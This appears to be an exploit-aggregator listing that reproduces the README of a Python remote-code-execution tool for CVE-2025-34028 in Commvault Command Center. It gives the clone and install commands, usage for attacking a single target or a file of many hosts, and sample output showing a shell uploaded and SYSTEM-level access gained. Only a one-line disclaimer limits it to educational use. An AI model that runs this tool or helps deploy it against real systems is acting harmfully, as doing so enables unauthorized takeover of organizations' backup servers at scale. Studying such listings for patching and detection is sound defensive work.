Exploit for Missing Authentication for Critical Function in Commvault CVE-2025-34028

Name: Exploit for Missing Authentication for Critical Function in Commvault CVE-2025-34028
Rating: 5 (167 reviews)
2025-05-06 | CVSS 10.0
## https://sploitus.com/exploit?id=2CE2F376-4CE4-5C78-9CA1-52E40B1BFFC8
# CVE-2025-34028 - Commvault Command Center Remote Code Execution
![Python](https://img.shields.io/badge/python-3.6+-blue.svg) ![License](https://img.shields.io/badge/license-MIT-green.svg) ![Vulnerability](https://img.shields.io/badge/critical-RCE-red.svg)

A Python exploit for CVE-2025-34028, a remote code execution vulnerability in Commvault Command Center. This tool allows testing single targets or scanning multiple hosts in bulk.

## Features
- Single target or bulk scanning capability
- Automatic Commvault instance verification
- Detailed output with system user information
- Random path generation for each execution
- Clean summary table of vulnerable hosts
- Comprehensive error handling

## Installation
```bash
git clone https://github.com/Mattb709/CVE-2025-34028-Commvault
cd CVE-2025-34028-Commvault
pip install -r requirements.txt
```

## Requirements
- Python 3.6+
- Required packages:
  - requests
  - tabulate

Install requirements with:
```bash
pip install requests tabulate
```

## Usage
```text
usage: CVE-2025-34028-Commvault.py [-h] (-t TARGET | -f TARGETS_FILE)

CVE-2025-34028 Commvault RCE Exploit

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Single target URL (e.g., https://192.168.1.100:8000)
  -f TARGETS_FILE, --file TARGETS_FILE
                        File containing multiple targets, one per line
```

## Examples
Test a single target:
```bash
python CVE-2025-34028-Commvault.py -t https://commvault.example.com:8000
```

Scan multiple targets from a file:
```bash
python CVE-2025-34028-Commvault.py -f targets.txt
```

## Target File Format
The targets file should contain one target per line in the format:
```text
https://host:port
http://ip
```

Example targets.txt:
```text
https://cv.company.com:8000
http://192.168.1.100
https://10.10.10.5:443
```

## Output
The script provides:
- Real-time progress with status for each target
- Detailed output for vulnerable hosts
- Summary table of all tested hosts
- Clear identification of successful exploitations

Sample output:
```text
CVE-2025-34028 Commvault RCE PoC

[1] Processing target: https://cvtest.example.com:8000
[1] [+] Valid Commvault instance detected
[1] [+] Shell uploaded successfully
[1] [+] System User: NT AUTHORITY\SYSTEM

[+] Results Summary
+---------+------------------------------+---------------------+------------------+
| Index   | URL                          | Status              | System User      |
+---------+------------------------------+---------------------+------------------+
| 1       | https://cvtest.example.com:8000 | RCE Successful      | NT AUTHORITY\SYSTEM |
+---------+------------------------------+---------------------+------------------+
```

## Disclaimer
This tool is for educational and authorized testing purposes only. The author is not responsible for any misuse or damage caused by this program.

## License
MIT License - See LICENSE file for details